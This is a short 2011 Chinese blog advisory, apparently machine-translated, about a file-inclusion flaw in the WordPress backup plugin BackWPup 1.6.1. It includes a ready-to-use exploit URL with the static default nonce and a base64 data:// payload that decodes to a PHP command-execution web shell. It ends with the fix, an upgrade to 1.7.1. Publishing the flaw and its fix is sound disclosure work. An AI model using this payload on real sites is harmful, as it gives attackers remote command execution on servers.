Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2284538
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2011-04-01 15:48:14

漏洞描述:WordPress的一款备份插件BackWPup
1.6.1可利用网页上执行本地或远程代码
服务器。 输入传递到组件“wp_xml_export.php”通过
“wpabs”变量允许纳入和执行本地或远程
PHP文件,只要有“_nonce”的价值是众所周知的。 在“_nonce”的价值
依赖于一个静态常量这不是在脚本中定义的含义
它默认值“822728c8d9”。
详细说明:wp_xml_export.php?_nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ
vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX
Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0
ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF
sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d
漏洞证明:受影响的版本。 1.6.1(验证),可能还有其他
修复方案:升级到版本1.7.1
请大家装了这个备份插件的赶紧升级或者卸载。

 
阅读(497) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~